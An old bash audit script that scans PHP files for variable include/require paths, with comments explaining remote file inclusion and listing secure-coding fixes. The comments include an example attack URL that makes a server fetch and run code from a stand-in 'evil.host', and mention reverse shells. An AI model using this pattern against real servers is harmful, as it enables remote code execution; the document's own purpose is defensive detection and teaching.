#!/bin/bash
#
# check which php code is potentially vulnerable from exploiting with 
# include variable.

echo "Perform php potentially vulnerable..."

find / -type f -a -name '*.php*' -print0 | xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$'

echo "You have to check every file come out from this search..."

echo "check instruction inside the script."

# now, some explain:
# 
# --=[introduction]=--
# php comes shipped with two features enabled by default that make
# unsuspicious looking source execute arbitrary code:
# - variables passed from the browser are stored in global context
# - file-system functions work transparent on URLs
# --=[our task]=--
# We looked for files often not directly accessed by the browser but
# included from somewhere else that contained something like this:
#    
#in helperfunction.php :
#  include("$includedir/library.php");
#  
# If the variable $includedir is not set by something executed before
# the include-statement, we can override it from the http-client with
# something like this:
#  
# http://vuln.host/helperfunction.php?includedir=http://evil.host/code
#  
# When the script is executed on vuln.host the php-interpreter will
# fetch the document http://evil.host/code/library.php and execute
# it. Breaking into the system is easy now because you can pass any
# php-source to the vulnerable system (download binaries, execute code,
# start reverse-shells (e.g. "xterm -display evil.host:1")...) that
# will be executed by the user running the web-server (mod_php) or by
# the owner of the virtual-host (CGI-interpreter).
# --=[solution]=--
# php is not insecure by default, but makes insecure programming very
# easy. Here are some solutions to write safe php-code:
#
# - give included php-files a filename that is not executed by the
#  web-server
#
# - put all included php-code outside the docroot (not possible for
#   all users), use file permissions or .htaccess
#
# - use constants (best approach)
#
#   in main.php:
#     define("MAINFILE", true);
#     define("CONFIGDIR", "/some/path/");
#     include('./some_function.inc');
#
#   in some_function.inc:
#     if ( !defined("MAINFILE") ) die ("this is a include file!");
#     include(CONFIGDIR . "config.inc");
#
#   If you set global variables from the client, they don't
#   interfere with constants; the defined-Test is not necessary for
#   security.
#
# - use $HTTP_*_VARS and disable global variables from the client
#
# --=[authors]=--
# script wrote by Maurizio - Tannoiser - Lemmo, based upon an original
# message from:  
# *    atil                <bugtraq@jakob.weite-welt.com>
# *    genetics                      <veenstra@chello.nl>
# *    #yaht@ircnet, Yet Another Hacker Team
# Wed Oct  3 12:52:41 CEST 2001